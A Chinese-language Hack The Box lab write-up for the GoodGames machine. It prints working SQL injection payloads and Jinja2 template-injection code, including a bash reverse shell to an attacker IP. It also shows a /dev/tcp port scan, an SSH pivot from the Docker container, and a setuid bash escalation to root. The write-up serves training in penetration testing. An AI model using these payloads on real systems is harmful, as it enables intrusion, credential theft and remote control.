GoodGames HTB Writeup

logo.png

知识点

1、sql注入

2、模板注入

3、docker逃逸（没有nmap等工具是应该如何执行主机扫描和端口扫描）

4、setuid提权

WP

常规nmap扫描，只找到了80端口的http服务

┌──(root💀192)-[/home/kali]
└─# nmap -sC -sV 10.10.11.130
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-14 13:41 CST
Nmap scan report for 10.10.11.130
Host is up (0.28s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE  VERSION
80/tcp open  ssl/http Werkzeug/2.0.2 Python/3.9.2
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store

直接访问web页面，在靶机中应该算是比较炫酷的主页了

01.png

爆破子目录，这里报错了，我们还是应该找到域名再去爆破目录，一般在页面上点击有可能会显示跳转的域名，但是我尝试了一下不太行。

┌──(root💀192)-[/home/kali]
└─# gobuster dir -u http://10.10.11.130/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -r -b 302
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.130/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   302
[+] User Agent:              gobuster/3.5
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2023/03/14 13:46:48 Starting gobuster in directory enumeration mode
===============================================================

Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.11.130/a25fddfa-faea-46d6-ae07-5fe9921fbcd7 => 200 (Length: 9265). To continue please exclude the status code or the length

翻到页面最底下，显示了域名GoodGames.HTB

02.png

注册一个账户尝试登陆，发现可以正常登陆成功，于是抓包登陆过程，开始尝试sql注入

03.png

登陆进来就是admin账户

04.png

复制http请求丢尽sqlmap里面跑，但是没有跑出结果，只能尝试手工注入了。

发现回显点是第四个字段

email=a'UNION SELECT 1,2,3,4 -- -&password=

05.png

数据库名称是main

06.png

查看当前数据库中的表名，发现三个表blog，blog_comment，user

email=a'UNION SELECT 1,2,3,concat(table_name,'$') from INFORMATION_SCHEMA.TABLES where table_schema=database() -- -&password=

07.png

显示表结构，user表中有email，id，name，password几个字段

email=a'UNION SELECT 1,2,3,concat(column_name,'$') from INFORMATION_SCHEMA.COLUMNS where table_name="user" -- -&password=

08.png

dump出表内容

email=a'UNION SELECT 1,2,3,concat(name,'\n',password) from user limit 10 -- -&password=

10.png

找到了密码，密码为superadministrator

09.png

得到这个密码暂时还不知道能干嘛，继续看页面，右上角有一个设置按钮，点击会跳转到一个子域名http://internal-administration.goodgames.htb/，将其添加进hosts文件

11.png

发现是一个flask登陆页面，这里可以使用刚才的用户名密码尝试登陆

12.png

成功登陆到后台，看了下是一个Volt模板，又是flask，所以肯定要测试下模板注入，首先我需要找到一个有输入，有回显的地方进行测试。我找到的是settings页面

13.png

成功测试出了模板注入漏洞

14.png

可以看到权限很高，直接就是root

{{ namespace.__init__.__globals__.os.popen('id').read() }}

15.png

反弹shell回来

{{namespace.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/10.10.14.4/1234 0>&1"').read()}}

root@3a453ab39d3d:/home/augustus# cat user.txt
cat user.txt
650fb0d7e814c6cf6bddbd94207cd90f

反弹的shll很不稳定，获得一个更好的shll

root@3a453ab39d3d:/backend# script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
root@3a453ab39d3d:/backend# ^Z
zsh: suspended  nc -lvvp 1234
┌──(root💀192)-[/home/kali]
└─# stty raw -echo; fg                                                  1 ⨯ 1 ⚙
[1]  + continued  nc -lvvp 1234

root@3a453ab39d3d:/backend# 

转到root目录下查看flag时候发现并没有flag保存，发现事情并不简单。

root@3a453ab39d3d:/backend# cat /root/root.txt
cat: /root/root.txt: No such file or directory
root@3a453ab39d3d:/backend# cd /root
root@3a453ab39d3d:~# ls
root@3a453ab39d3d:~#

运行la -al /发现.dockerenv，确认我们在docker容器中，我们需要从docker逃脱到主机上。

root@3a453ab39d3d:~# ls -al /
total 88
drwxr-xr-x   1 root root 4096 Nov  5  2021 .
drwxr-xr-x   1 root root 4096 Nov  5  2021 ..
-rwxr-xr-x   1 root root    0 Nov  5  2021 .dockerenv
drwxr-xr-x   1 root root 4096 Nov  5  2021 backend
drwxr-xr-x   1 root root 4096 Nov  5  2021 bin
drwxr-xr-x   2 root root 4096 Oct 20  2018 boot
drwxr-xr-x   5 root root  340 Mar 14 02:49 dev
drwxr-xr-x   1 root root 4096 Nov  5  2021 etc
drwxr-xr-x   1 root root 4096 Nov  5  2021 home
drwxr-xr-x   1 root root 4096 Nov 16  2018 lib
drwxr-xr-x   2 root root 4096 Nov 12  2018 lib64
drwxr-xr-x   2 root root 4096 Nov 12  2018 media
drwxr-xr-x   2 root root 4096 Nov 12  2018 mnt
drwxr-xr-x   2 root root 4096 Nov 12  2018 opt
dr-xr-xr-x 196 root root    0 Mar 14 02:49 proc
drwx------   1 root root 4096 Mar 14 04:40 root
drwxr-xr-x   3 root root 4096 Nov 12  2018 run
drwxr-xr-x   1 root root 4096 Nov  5  2021 sbin
drwxr-xr-x   2 root root 4096 Nov 12  2018 srv
dr-xr-xr-x  13 root root    0 Mar 14 02:49 sys
drwxrwxrwt   1 root root 4096 Nov  5  2021 tmp
drwxr-xr-x   1 root root 4096 Nov 12  2018 usr
drwxr-xr-x   1 root root 4096 Nov 12  2018 var

尝试在这台主机上扫描C段IP

root@3a453ab39d3d:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.19.0.2  netmask 255.255.0.0  broadcast 172.19.255.255
        ether 02:42:ac:13:00:02  txqueuelen 0  (Ethernet)
        RX packets 13659  bytes 3073446 (2.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11577  bytes 7978216 (7.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

64 bytes from 172.19.0.1: icmp_seq=1 ttl=64 time=0.111 ms
64 bytes from 172.19.0.2: icmp_seq=1 ttl=64 time=0.075 ms

# 端口扫描
for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null

22 open
80 open

发现172.19.0.1主机是存活的，这个主机应该就是宿主机。进行端口扫描之后发现开放了22和80端口

使用augustus:superadministrator尝试登陆宿主机

root@3a453ab39d3d:/home# ssh augustus@172.19.0.1
augustus@172.19.0.1's password: 
Linux GoodGames 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 14 04:47:25 2023 from 172.19.0.2
augustus@GoodGames:~$ sudo -l
-bash: sudo: command not found
augustus@GoodGames:~$ find / -user root -perm /4000 2>/dev/null
/home/augustus/bash
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/mount
/usr/bin/su
augustus@GoodGames:~$ cd /home
augustus@GoodGames:/home$ ls
augustus
augustus@GoodGames:/home$ cd augustus/
augustus@GoodGames:~$ ls
bash  test  user.txt

在docker中新建一个测试文件，修改文件的权限后发现宿主机中文件的权限也会跟着变

root@3a453ab39d3d:/home/augustus# touch mytest
root@3a453ab39d3d:/home/augustus# ls -al mytest
-rw-r--r-- 1 root root 0 Mar 14 08:08 mytest

# 切换到宿主机中查看权限
augustus@GoodGames:~$ ls -al
total 1236
drwxr-xr-x 3 augustus augustus    4096 Mar 14 08:08 .
drwxr-xr-x 3 root     root        4096 Oct 19  2021 ..
-rwsrwxrwx 1 root     root     1234376 Mar 14 04:55 bash
lrwxrwxrwx 1 root     root           9 Nov  3  2021 .bash_history -> /dev/null
-rw-r--r-- 1 augustus augustus     220 Oct 19  2021 .bash_logout
-rw-r--r-- 1 augustus augustus    3526 Oct 19  2021 .bashrc
drwx------ 3 augustus augustus    4096 Mar 14 04:50 .gnupg
-rwSr--r-- 1 root     root           0 Mar 14 08:08 mytest
-rw-r--r-- 1 augustus augustus     807 Oct 19  2021 .profile
-rw-r--r-- 1 root     root           0 Mar 14 04:53 test
-rw-r----- 1 root     augustus      33 Mar 14 02:49 user.txt

给bash加上s位，直接在宿主机中执行.bash -p获取shell，得到的是root权限

augustus@GoodGames:~$ ./bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
8c3edc1cbe6d1e9185a2ac3ac6c3c5ea
bash-5.1#